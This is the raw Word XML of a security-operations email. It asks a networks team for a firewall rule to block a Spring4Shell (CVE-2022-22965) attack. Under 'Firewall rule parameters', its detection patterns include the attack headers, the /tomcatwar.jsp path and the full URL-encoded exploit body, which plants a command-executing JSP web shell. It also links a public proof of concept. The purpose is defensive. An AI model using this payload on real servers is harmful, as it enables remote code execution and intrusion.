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color w:val="000000"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Telstra Security Operations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color w:val="000000"/>
        </w:rPr>
        <w:t>To:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Networks Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>networks@email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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color w:val="000000"/>
        </w:rPr>
        <w:t>Subject:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Firewall Rule </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">for pattern in request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>clientRequestData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t>—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color w:val="000000"/>
        </w:rPr>
        <w:t>Body: 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t xml:space="preserve">Hello </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Networks Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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t>We would like to request the creation of a firewall rule and provide you more information about the ongoing attack.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Attack information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="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/>
        <w:t>The attack’s payload has been identified showing signs from a Spring4Shell vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="B7B7B7"/>
          <w:shd w:fill="CC0000" w:val="clear"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:shd w:fill="CC0000" w:val="clear"/>
        </w:rPr>
        <w:t>CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Firewall rule parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>While adding the firewall rule to block the request consider the following pattern to identify the malicious payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1) Block incoming HTTP requests with clientRequestPath as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/tomcatwar.jsp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2) Block incoming HTTP requests with the following headers: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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>headers = {"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>suffix</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>//",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                </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>",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                </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>",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                </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DNT</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240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/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3) If feasible block incoming HTTP requests with</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> data = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr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40"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The following researcher’s proof of concept payload showed the patterns in the attack </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/craig/SpringCore0day/blob/main/README.md</w:t>
        </w:r>
      </w:hyperlink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t>For any questions or issues, don’t hesitate to reach out to us.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t>Kind regards,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t>Telstra Security Operations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AU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1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00a63c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raig/SpringCore0day/blob/main/README.m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WSfRIpfamW9sf/AncXG2xI0QmwA==">CgMxLjA4AHIhMWVEVHBLYkRQVV8xNDVlRzdXLTdEVjRIX0ludEtpSDFq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LibreOffice/7.5.6.2$Linux_X86_64 LibreOffice_project/50$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>1</Pages>
  <Words>155</Words>
  <Characters>1782</Characters>
  <CharactersWithSpaces>1984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2022-03-23T19:09:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-20T17:10:27Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>